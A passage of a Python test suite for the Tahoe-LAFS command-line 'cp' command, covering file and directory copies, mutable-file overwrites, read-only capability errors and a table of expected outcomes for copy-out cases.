d.addCallback(_get_resp)
# ... and to an explicit filename different from the source filename.
d.addCallback(lambda ign:
self.do_cli("cp", self.dircap + "/test_file", fn3))
def _get_resp2((rc, out, err)):
self.failUnlessReallyEqual(rc, 0)
results = fileutil.read(fn3)
self.failUnlessReallyEqual(results, DATA1)
d.addCallback(_get_resp2)
# Test that the --verbose option prints correct indices (#1805).
d.addCallback(lambda ign:
self.do_cli("cp", "--verbose", fn3, self.dircap))
def _test_for_wrong_indices((rc, out, err)):
lines = err.split('\n')
self.failUnlessIn('examining 1 of 1', lines)
self.failUnlessIn('starting copy, 1 files, 1 directories', lines)
self.failIfIn('examining 0 of', err)
d.addCallback(_test_for_wrong_indices)
return d
def test_cp_with_nonexistent_alias(self):
# when invoked with an alias or aliases that don't exist, 'tahoe cp'
# should output a sensible error message rather than a stack trace.
self.basedir = "cli/Cp/cp_with_nonexistent_alias"
self.set_up_grid()
d = self.do_cli("cp", "fake:file1", "fake:file2")
def _check((rc, out, err)):
self.failUnlessReallyEqual(rc, 1)
self.failUnlessIn("error:", err)
d.addCallback(_check)
# 'tahoe cp' actually processes the target argument first, so we need
# to check to make sure that validation extends to the source
# argument.
d.addCallback(lambda ign: self.do_cli("create-alias", "tahoe"))
d.addCallback(lambda ign: self.do_cli("cp", "fake:file1",
"tahoe:file2"))
d.addCallback(_check)
return d
def test_unicode_dirnames(self):
self.basedir = "cli/Cp/unicode_dirnames"
fn1 = os.path.join(unicode(self.basedir), u"\u00C4rtonwall")
try:
fn1_arg = fn1.encode(get_io_encoding())
del fn1_arg # hush pyflakes
artonwall_arg = u"\u00C4rtonwall".encode(get_io_encoding())
except UnicodeEncodeError:
raise unittest.SkipTest("A non-ASCII command argument could not be encoded on this platform.")
self.skip_if_cannot_represent_filename(fn1)
self.set_up_grid()
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda res: self.do_cli("mkdir", "tahoe:test/" + artonwall_arg))
d.addCallback(lambda res: self.do_cli("cp", "-r", "tahoe:test", "tahoe:test2"))
d.addCallback(lambda res: self.do_cli("ls", "tahoe:test2/test"))
def _check((rc, out, err)):
try:
unicode_to_output(u"\u00C4rtonwall")
except UnicodeEncodeError:
self.failUnlessReallyEqual(rc, 1)
self.failUnlessReallyEqual(out, "")
self.failUnlessIn(quote_output(u"\u00C4rtonwall"), err)
self.failUnlessIn("files whose names could not be converted", err)
else:
self.failUnlessReallyEqual(rc, 0)
self.failUnlessReallyEqual(out.decode(get_io_encoding()), u"\u00C4rtonwall\n")
self.failUnlessReallyEqual(err, "")
d.addCallback(_check)
return d
def test_cp_replaces_mutable_file_contents(self):
self.basedir = "cli/Cp/cp_replaces_mutable_file_contents"
self.set_up_grid()
# Write a test file, which we'll copy to the grid.
test_txt_path = os.path.join(self.basedir, "test.txt")
test_txt_contents = "foo bar baz"
f = open(test_txt_path, "w")
f.write(test_txt_contents)
f.close()
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ignored:
self.do_cli("mkdir", "tahoe:test"))
# We have to use 'tahoe put' here because 'tahoe cp' doesn't
# know how to make mutable files at the destination.
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", test_txt_path, "tahoe:test/test.txt"))
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test/test.txt"))
def _check((rc, out, err)):
self.failUnlessEqual(rc, 0)
self.failUnlessEqual(out, test_txt_contents)
d.addCallback(_check)
# We'll do ls --json to get the read uri and write uri for the
# file we've just uploaded.
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test/test.txt"))
def _get_test_txt_uris((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
self.failUnless(data['mutable'])
self.failUnlessIn("rw_uri", data)
self.rw_uri = to_str(data["rw_uri"])
self.failUnlessIn("ro_uri", data)
self.ro_uri = to_str(data["ro_uri"])
d.addCallback(_get_test_txt_uris)
# Now make a new file to copy in place of test.txt.
new_txt_path = os.path.join(self.basedir, "new.txt")
new_txt_contents = "baz bar foo" * 100000
f = open(new_txt_path, "w")
f.write(new_txt_contents)
f.close()
# Copy the new file on top of the old file.
d.addCallback(lambda ignored:
self.do_cli("cp", new_txt_path, "tahoe:test/test.txt"))
# If we get test.txt now, we should see the new data.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test/test.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, new_txt_contents))
# If we get the json of the new file, we should see that the old
# uri is there
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test/test.txt"))
def _check_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
self.failUnless(data['mutable'])
self.failUnlessIn("ro_uri", data)
self.failUnlessEqual(to_str(data["ro_uri"]), self.ro_uri)
self.failUnlessIn("rw_uri", data)
self.failUnlessEqual(to_str(data["rw_uri"]), self.rw_uri)
d.addCallback(_check_json)
# and, finally, doing a GET directly on one of the old uris
# should give us the new contents.
d.addCallback(lambda ignored:
self.do_cli("get", self.rw_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, new_txt_contents))
# Now copy the old test.txt without an explicit destination
# file. tahoe cp will match it to the existing file and
# overwrite it appropriately.
d.addCallback(lambda ignored:
self.do_cli("cp", test_txt_path, "tahoe:test"))
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test/test.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_txt_contents))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test/test.txt"))
d.addCallback(_check_json)
d.addCallback(lambda ignored:
self.do_cli("get", self.rw_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_txt_contents))
# Now we'll make a more complicated directory structure.
# test2/
# test2/mutable1
# test2/mutable2
# test2/imm1
# test2/imm2
imm_test_txt_path = os.path.join(self.basedir, "imm_test.txt")
imm_test_txt_contents = test_txt_contents * 10000
fileutil.write(imm_test_txt_path, imm_test_txt_contents)
d.addCallback(lambda ignored:
self.do_cli("mkdir", "tahoe:test2"))
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", new_txt_path,
"tahoe:test2/mutable1"))
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", new_txt_path,
"tahoe:test2/mutable2"))
d.addCallback(lambda ignored:
self.do_cli('put', new_txt_path, "tahoe:test2/imm1"))
d.addCallback(lambda ignored:
self.do_cli("put", imm_test_txt_path, "tahoe:test2/imm2"))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test2"))
def _process_directory_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "dirnode")
self.failUnless(data['mutable'])
self.failUnlessIn("children", data)
children = data['children']
# Store the URIs for later use.
self.childuris = {}
for k in ["mutable1", "mutable2", "imm1", "imm2"]:
self.failUnlessIn(k, children)
childtype, childdata = children[k]
self.failUnlessEqual(childtype, "filenode")
if "mutable" in k:
self.failUnless(childdata['mutable'])
self.failUnlessIn("rw_uri", childdata)
uri_key = "rw_uri"
else:
self.failIf(childdata['mutable'])
self.failUnlessIn("ro_uri", childdata)
uri_key = "ro_uri"
self.childuris[k] = to_str(childdata[uri_key])
d.addCallback(_process_directory_json)
# Now build a local directory to copy into place, like the following:
# test2/
# test2/mutable1
# test2/mutable2
# test2/imm1
# test2/imm3
def _build_local_directory(ignored):
test2_path = os.path.join(self.basedir, "test2")
fileutil.make_dirs(test2_path)
for fn in ("mutable1", "mutable2", "imm1", "imm3"):
fileutil.write(os.path.join(test2_path, fn), fn * 1000)
self.test2_path = test2_path
d.addCallback(_build_local_directory)
d.addCallback(lambda ignored:
self.do_cli("cp", "-r", self.test2_path, "tahoe:"))
# We expect that mutable1 and mutable2 are overwritten in-place,
# so they'll retain their URIs but have different content.
def _process_file_json((rc, out, err), fn):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
if "mutable" in fn:
self.failUnless(data['mutable'])
self.failUnlessIn("rw_uri", data)
self.failUnlessEqual(to_str(data["rw_uri"]), self.childuris[fn])
else:
self.failIf(data['mutable'])
self.failUnlessIn("ro_uri", data)
self.failIfEqual(to_str(data["ro_uri"]), self.childuris[fn])
for fn in ("mutable1", "mutable2"):
d.addCallback(lambda ignored, fn=fn:
self.do_cli("get", "tahoe:test2/%s" % fn))
d.addCallback(lambda (rc, out, err), fn=fn:
self.failUnlessEqual(out, fn * 1000))
d.addCallback(lambda ignored, fn=fn:
self.do_cli("ls", "--json", "tahoe:test2/%s" % fn))
d.addCallback(_process_file_json, fn=fn)
# imm1 should have been replaced, so both its uri and content
# should be different.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test2/imm1"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, "imm1" * 1000))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test2/imm1"))
d.addCallback(_process_file_json, fn="imm1")
# imm3 should have been created.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test2/imm3"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, "imm3" * 1000))
# imm2 should be exactly as we left it, since our newly-copied
# directory didn't contain an imm2 entry.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test2/imm2"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, imm_test_txt_contents))
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test2/imm2"))
def _process_imm2_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
self.failIf(data['mutable'])
self.failUnlessIn("ro_uri", data)
self.failUnlessEqual(to_str(data["ro_uri"]), self.childuris["imm2"])
d.addCallback(_process_imm2_json)
return d
def test_cp_overwrite_readonly_mutable_file(self):
# tahoe cp should print an error when asked to overwrite a
# mutable file that it can't overwrite.
self.basedir = "cli/Cp/overwrite_readonly_mutable_file"
self.set_up_grid()
# This is our initial file. We'll link its readcap into the
# tahoe: alias.
test_file_path = os.path.join(self.basedir, "test_file.txt")
test_file_contents = "This is a test file."
fileutil.write(test_file_path, test_file_contents)
# This is our replacement file. We'll try and fail to upload it
# over the readcap that we linked into the tahoe: alias.
replacement_file_path = os.path.join(self.basedir, "replacement.txt")
replacement_file_contents = "These are new contents."
fileutil.write(replacement_file_path, replacement_file_contents)
d = self.do_cli("create-alias", "tahoe:")
d.addCallback(lambda ignored:
self.do_cli("put", "--mutable", test_file_path))
def _get_test_uri((rc, out, err)):
self.failUnlessEqual(rc, 0)
# this should be a write uri
self._test_write_uri = out
d.addCallback(_get_test_uri)
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", self._test_write_uri))
def _process_test_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "filenode")
self.failUnless(data['mutable'])
self.failUnlessIn("ro_uri", data)
self._test_read_uri = to_str(data["ro_uri"])
d.addCallback(_process_test_json)
# Now we'll link the readonly URI into the tahoe: alias.
d.addCallback(lambda ignored:
self.do_cli("ln", self._test_read_uri, "tahoe:test_file.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(rc, 0))
# Let's grab the json of that to make sure that we did it right.
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:"))
def _process_tahoe_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "dirnode")
self.failUnlessIn("children", data)
kiddata = data['children']
self.failUnlessIn("test_file.txt", kiddata)
testtype, testdata = kiddata['test_file.txt']
self.failUnlessEqual(testtype, "filenode")
self.failUnless(testdata['mutable'])
self.failUnlessIn("ro_uri", testdata)
self.failUnlessEqual(to_str(testdata["ro_uri"]), self._test_read_uri)
self.failIfIn("rw_uri", testdata)
d.addCallback(_process_tahoe_json)
# Okay, now we're going to try uploading another mutable file in
# place of that one. We should get an error.
d.addCallback(lambda ignored:
self.do_cli("cp", replacement_file_path, "tahoe:test_file.txt"))
def _check_error_message((rc, out, err)):
self.failUnlessEqual(rc, 1)
self.failUnlessIn("replace or update requested with read-only cap", err)
d.addCallback(_check_error_message)
# Make extra sure that that didn't work.
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test_file.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
d.addCallback(lambda ignored:
self.do_cli("get", self._test_read_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
# Now we'll do it without an explicit destination.
d.addCallback(lambda ignored:
self.do_cli("cp", test_file_path, "tahoe:"))
d.addCallback(_check_error_message)
d.addCallback(lambda ignored:
self.do_cli("get", "tahoe:test_file.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
d.addCallback(lambda ignored:
self.do_cli("get", self._test_read_uri))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(out, test_file_contents))
# Now we'll link a readonly file into a subdirectory.
d.addCallback(lambda ignored:
self.do_cli("mkdir", "tahoe:testdir"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(rc, 0))
d.addCallback(lambda ignored:
self.do_cli("ln", self._test_read_uri, "tahoe:test/file2.txt"))
d.addCallback(lambda (rc, out, err):
self.failUnlessEqual(rc, 0))
test_dir_path = os.path.join(self.basedir, "test")
fileutil.make_dirs(test_dir_path)
for f in ("file1.txt", "file2.txt"):
fileutil.write(os.path.join(test_dir_path, f), f * 10000)
d.addCallback(lambda ignored:
self.do_cli("cp", "-r", test_dir_path, "tahoe:"))
d.addCallback(_check_error_message)
d.addCallback(lambda ignored:
self.do_cli("ls", "--json", "tahoe:test"))
def _got_testdir_json((rc, out, err)):
self.failUnlessEqual(rc, 0)
filetype, data = simplejson.loads(out)
self.failUnlessEqual(filetype, "dirnode")
self.failUnlessIn("children", data)
childdata = data['children']
self.failUnlessIn("file2.txt", childdata)
file2type, file2data = childdata['file2.txt']
self.failUnlessEqual(file2type, "filenode")
self.failUnless(file2data['mutable'])
self.failUnlessIn("ro_uri", file2data)
self.failUnlessEqual(to_str(file2data["ro_uri"]), self._test_read_uri)
self.failIfIn("rw_uri", file2data)
d.addCallback(_got_testdir_json)
return d
def test_cp_verbose(self):
self.basedir = "cli/Cp/cp_verbose"
self.set_up_grid()
# Write two test files, which we'll copy to the grid.
test1_path = os.path.join(self.basedir, "test1")
test2_path = os.path.join(self.basedir, "test2")
fileutil.write(test1_path, "test1")
fileutil.write(test2_path, "test2")
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign:
self.do_cli("cp", "--verbose", test1_path, test2_path, "tahoe:"))
def _check(res):
(rc, out, err) = res
self.failUnlessEqual(rc, 0, str(res))
self.failUnlessIn("Success: files copied", out, str(res))
self.failUnlessEqual(err, """\
attaching sources to targets, 2 files / 0 dirs in root
targets assigned, 1 dirs, 2 files
starting copy, 2 files, 1 directories
1/2 files, 0/1 directories
2/2 files, 0/1 directories
1/1 directories
""", str(res))
d.addCallback(_check)
return d
def test_cp_copies_dir(self):
# This test ensures that a directory is copied using
# tahoe cp -r. Refer to ticket #712:
# https://tahoe-lafs.org/trac/tahoe-lafs/ticket/712
self.basedir = "cli/Cp/cp_copies_dir"
self.set_up_grid()
subdir = os.path.join(self.basedir, "foo")
os.mkdir(subdir)
test1_path = os.path.join(subdir, "test1")
fileutil.write(test1_path, "test1")
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign:
self.do_cli("cp", "-r", subdir, "tahoe:"))
d.addCallback(lambda ign:
self.do_cli("ls", "tahoe:"))
def _check(res, item):
(rc, out, err) = res
self.failUnlessEqual(rc, 0)
self.failUnlessEqual(err, "")
self.failUnlessIn(item, out, str(res))
d.addCallback(_check, "foo")
d.addCallback(lambda ign:
self.do_cli("ls", "tahoe:foo/"))
d.addCallback(_check, "test1")
d.addCallback(lambda ign: fileutil.rm_dir(subdir))
d.addCallback(lambda ign: self.do_cli("cp", "-r", "tahoe:foo", self.basedir))
def _check_local_fs(ign):
self.failUnless(os.path.isdir(self.basedir))
self.failUnless(os.path.isfile(test1_path))
d.addCallback(_check_local_fs)
return d
def test_ticket_2027(self):
# This test ensures that tahoe will copy a file from the grid to
# a local directory without a specified file name.
# https://tahoe-lafs.org/trac/tahoe-lafs/ticket/2027
self.basedir = "cli/Cp/cp_verbose"
self.set_up_grid()
# Write a test file, which we'll copy to the grid.
test1_path = os.path.join(self.basedir, "test1")
fileutil.write(test1_path, "test1")
d = self.do_cli("create-alias", "tahoe")
d.addCallback(lambda ign:
self.do_cli("cp", test1_path, "tahoe:"))
d.addCallback(lambda ign:
self.do_cli("cp", "tahoe:test1", self.basedir))
def _check(res):
(rc, out, err) = res
self.failUnlessIn("Success: file copied", out, str(res))
return d
# these test cases come from ticket #2329 comment 40
# trailing slash on target *directory* should not matter, test both
# trailing slash on target files should cause error
# trailing slash on source directory should not matter, test a few
# trailing slash on source files should cause error
COPYOUT_TESTCASES = """
cp $FILECAP to/existing-file : to/existing-file
cp -r $FILECAP to/existing-file : to/existing-file
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file : E6-MANYONE
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file : E6-MANYONE
cp $DIRCAP to/existing-file : E4-NEED-R
cp -r $DIRCAP to/existing-file : E5-DIRTOFILE
cp $FILECAP $DIRCAP to/existing-file : E4-NEED-R
cp -r $FILECAP $DIRCAP to/existing-file : E6-MANYONE
cp $FILECAP to/existing-file/ : E7-BADSLASH
cp -r $FILECAP to/existing-file/ : E7-BADSLASH
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file/ : E7-BADSLASH
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/existing-file/ : E7-BADSLASH
cp $DIRCAP to/existing-file/ : E4-NEED-R
cp -r $DIRCAP to/existing-file/ : E7-BADSLASH
cp $FILECAP $DIRCAP to/existing-file/ : E4-NEED-R
cp -r $FILECAP $DIRCAP to/existing-file/ : E7-BADSLASH
# single source to a (present) target directory
cp $FILECAP to : E2-DESTNAME
cp -r $FILECAP to : E2-DESTNAME
cp $DIRCAP/file to : to/file
cp -r $DIRCAP/file to : to/file
# these two are errors
cp $DIRCAP/file/ to : E8-BADSLASH
cp -r $DIRCAP/file/ to : E8-BADSLASH
cp $PARENTCAP/dir to : E4-NEED-R
cp -r $PARENTCAP/dir to : to/dir/file
# but these two should ignore the trailing source slash
cp $PARENTCAP/dir/ to : E4-NEED-R
cp -r $PARENTCAP/dir/ to : to/dir/file
cp $DIRCAP to : E4-NEED-R
cp -r $DIRCAP to : to/file
cp $DIRALIAS to : E4-NEED-R
cp -r $DIRALIAS to : to/file
cp $FILECAP to/ : E2-DESTNAME
cp -r $FILECAP to/ : E2-DESTNAME
cp $DIRCAP/file to/ : to/file
cp -r $DIRCAP/file to/ : to/file
cp $PARENTCAP/dir to/ : E4-NEED-R
cp -r $PARENTCAP/dir to/ : to/dir/file
cp $DIRCAP to/ : E4-NEED-R
cp -r $DIRCAP to/ : to/file
cp $DIRALIAS to/ : E4-NEED-R
cp -r $DIRALIAS to/ : to/file
# multiple sources to a (present) target directory
cp $DIRCAP/file $PARENTCAP/dir2/file2 to : to/file,to/file2
cp $DIRCAP/file $FILECAP to : E2-DESTNAME
cp $DIRCAP $FILECAP to : E4-NEED-R
cp -r $DIRCAP $FILECAP to : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to : to/file3,to/file,to/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to : E2-DESTNAME
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/ : to/file,to/file2
cp $DIRCAP/file $FILECAP to/ : E2-DESTNAME
cp $DIRCAP $FILECAP to/ : E4-NEED-R
cp -r $DIRCAP $FILECAP to/ : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/ : to/file3,to/file,to/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/ : E2-DESTNAME
# single sources to a missing target: should mkdir or create a file
cp $FILECAP to/missing : to/missing
cp -r $FILECAP to/missing : to/missing
cp $DIRCAP/file to/missing : to/missing
cp -r $DIRCAP/file to/missing : to/missing
cp $PARENTCAP/dir to/missing : E4-NEED-R
cp -r $PARENTCAP/dir to/missing : to/missing/dir/file
cp $DIRCAP to/missing : E4-NEED-R
cp -r $DIRCAP to/missing : to/missing/file
cp $DIRALIAS to/missing : E4-NEED-R
cp -r $DIRALIAS to/missing : to/missing/file
cp $FILECAP to/missing/ : E7-BADSLASH
cp -r $FILECAP to/missing/ : E7-BADSLASH
cp $DIRCAP/file to/missing/ : E7-BADSLASH
cp -r $DIRCAP/file to/missing/ : E7-BADSLASH
cp $PARENTCAP/dir to/missing/ : E4-NEED-R
cp -r $PARENTCAP/dir to/missing/ : to/missing/dir/file
cp $DIRCAP to/missing/ : E4-NEED-R
cp -r $DIRCAP to/missing/ : to/missing/file
cp $DIRALIAS to/missing/ : E4-NEED-R
cp -r $DIRALIAS to/missing/ : to/missing/file
# multiple things to a missing target: should mkdir
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/missing : to/missing/file,to/missing/file2
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/missing : to/missing/file,to/missing/file2
cp $DIRCAP/file $FILECAP to/missing : E2-DESTNAME
cp -r $DIRCAP/file $FILECAP to/missing : E2-DESTNAME
cp $DIRCAP $FILECAP to/missing : E4-NEED-R
cp -r $DIRCAP $FILECAP to/missing : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing : to/missing/file3,to/missing/file,to/missing/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing : E2-DESTNAME
cp $DIRCAP/file $PARENTCAP/dir2/file2 to/missing/ : to/missing/file,to/missing/file2
cp -r $DIRCAP/file $PARENTCAP/dir2/file2 to/missing/ : to/missing/file,to/missing/file2
cp $DIRCAP/file $FILECAP to/missing/ : E2-DESTNAME
cp -r $DIRCAP/file $FILECAP to/missing/ : E2-DESTNAME
cp $DIRCAP $FILECAP to/missing/ : E4-NEED-R
cp -r $DIRCAP $FILECAP to/missing/ : E2-DESTNAME
# namedfile, unnameddir, nameddir
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 to/missing/ : to/missing/file3,to/missing/file,to/missing/dir2/file2
# namedfile, unnameddir, nameddir, unnamedfile
cp $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing/ : E4-NEED-R
cp -r $PARENTCAP/dir3/file3 $DIRCAP $PARENTCAP/dir2 $FILECAP to/missing/ : E2-DESTNAME
# make sure empty directories are copied too
cp -r $PARENTCAP/dir4 to : to/dir4/emptydir/
cp -r $PARENTCAP/dir4 to/ : to/dir4/emptydir/
# name collisions should cause errors, not overwrites
cp -r $PARENTCAP/dir6/dir $PARENTCAP/dir5/dir to : E9-COLLIDING-TARGETS
cp -r $PARENTCAP/dir5/dir $PARENTCAP/dir6/dir to : E9-COLLIDING-TARGETS
cp -r $DIRCAP6 $DIRCAP5 to : E9-COLLIDING-TARGETS
cp -r $DIRCAP5 $DIRCAP6 to : E9-COLLIDING-TARGETS
"""
class CopyOut(GridTestMixin, CLITestMixin, unittest.TestCase):
FILE_CONTENTS = "file text"
FILE_CONTENTS_5 = "5"
FILE_CONTENTS_6 = "6"
def do_setup(self):
# first we build a tahoe filesystem that contains:
# $PARENTCAP
# $PARENTCAP/dir == $DIRCAP == alias:
# $PARENTCAP/dir/file == $FILECAP
# $PARENTCAP/dir2 (named directory)
# $PARENTCAP/dir2/file2
# $PARENTCAP/dir3/file3 (a second named file)
# $PARENTCAP/dir4
# $PARENTCAP/dir4/emptydir/ (an empty directory)
# $PARENTCAP/dir5 == $DIRCAP5
# $PARENTCAP/dir5/dir/collide (contents are "5")
# $PARENTCAP/dir6 == $DIRCAP6
# $PARENTCAP/dir6/dir/collide (contents are "6")
source_file = os.path.join(self.basedir, "file")
fileutil.write(source_file, self.FILE_CONTENTS)
source_file_5 = os.path.join(self.basedir, "file5")
fileutil.write(source_file_5, self.FILE_CONTENTS_5)
source_file_6 = os.path.join(self.basedir, "file6")
fileutil.write(source_file_6, self.FILE_CONTENTS_6)
d = self.do_cli("mkdir")
def _stash_parentdircap(res):
(rc, out, err) = res
self.failUnlessEqual(rc, 0, str(res))
self.failUnlessEqual(err, "", str(res))
self.PARENTCAP = out.strip()
return self.do_cli("mkdir", "%s/dir" % self.PARENTCAP)
d.addCallback(_stash_parentdircap)
def _stash_dircap(res):
(rc, out, err) = res
self.failUnlessEqual(rc, 0, str(res))
self.failUnlessEqual(err, "", str(res))
self.DIRCAP = out.strip()
return self.do_cli("add-alias", "ALIAS", self.DIRCAP)
d.addCallback(_stash_dircap)
d.addCallback(lambda ign:
self.do_cli("put", source_file, "%s/dir/file" % self.PARENTCAP))
def _stash_filecap(res):
(rc, out, err) = res
self.failUnlessEqual(rc, 0, str(res))
self.failUnlessEqual(err.strip(), "201 Created", str(res))
self.FILECAP = out.strip()
assert self.FILECAP.startswith("URI:LIT:")
d.addCallback(_stash_filecap)
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir2" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("put", source_file, "%s/dir2/file2" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir3" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("put", source_file, "%s/dir3/file3" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir4" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir4/emptydir" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir5" % self.PARENTCAP))
def _stash_dircap_5(res):
(rc, out, err) = res
self.failUnlessEqual(rc, 0, str(res))
self.failUnlessEqual(err, "", str(res))
self.DIRCAP5 = out.strip()
d.addCallback(_stash_dircap_5)
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir5/dir" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("put", source_file_5, "%s/dir5/dir/collide" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir6" % self.PARENTCAP))
def _stash_dircap_6(res):
(rc, out, err) = res
self.failUnlessEqual(rc, 0, str(res))
self.failUnlessEqual(err, "", str(res))
self.DIRCAP6 = out.strip()
d.addCallback(_stash_dircap_6)
d.addCallback(lambda ign:
self.do_cli("mkdir", "%s/dir6/dir" % self.PARENTCAP))
d.addCallback(lambda ign:
self.do_cli("put", source_file_6, "%s/dir6/dir/collide" % self.PARENTCAP))
return d
def check_output(self):
# locate the files and directories created (if any) under to/
top = os.path.join(self.basedir, "to")
results = set()
for (dirpath, dirnames, filenames) in os.walk(top):
assert dirpath.startswith(top)
here = "/".join(dirpath.split(os.sep)[len(top.split(os.sep))-1:])
results.add(here+"/")
for fn in filenames:
contents = fileutil.read(os.path.join(dirpath, fn))
if contents == self.FILE_CONTENTS:
results.add("%s/%s" % (here, fn))
elif contents == self.FILE_CONTENTS_5:
results.add("%s/%s=5" % (here, fn))
elif contents == self.FILE_CONTENTS_6:
results.add("%s/%s=6" % (here, fn))
return results
def run_one_case(self, case):
cmd = (case
.replace("$PARENTCAP", self.PARENTCAP)
.replace("$DIRCAP5", self.DIRCAP5)
.replace("$DIRCAP6", self.DIRCAP6)
.replace("$DIRCAP", self.DIRCAP)
.replace("$DIRALIAS", "ALIAS:")
.replace("$FILECAP", self.FILECAP)
.split())
target = cmd[-1]
_assert(target == "to" or target.startswith("to/"), target)
cmd[-1] = os.path.abspath(os.path.join(self.basedir, cmd[-1]))
# reset
targetdir = os.path.abspath(os.path.join(self.basedir, "to"))
fileutil.rm_dir(targetdir)
os.mkdir(targetdir)
if target.rstrip("/") == "to/existing-file":
fileutil.write(cmd[-1], "existing file contents\n")
# The abspath() for cmd[-1] strips a trailing slash, and we want to
# test what happens when it is present. So put it back.
if target.endswith("/"):
cmd[-1] += "/"
d = self.do_cli(*cmd)
def _check(res):
(rc, out, err) = res
err = err.strip()
if rc == 0:
return self.check_output()
if rc == 1:
self.failUnlessEqual(out, "", str(res))
if "when copying into a directory, all source files must have names, but" in err:
return set(["E2-DESTNAME"])
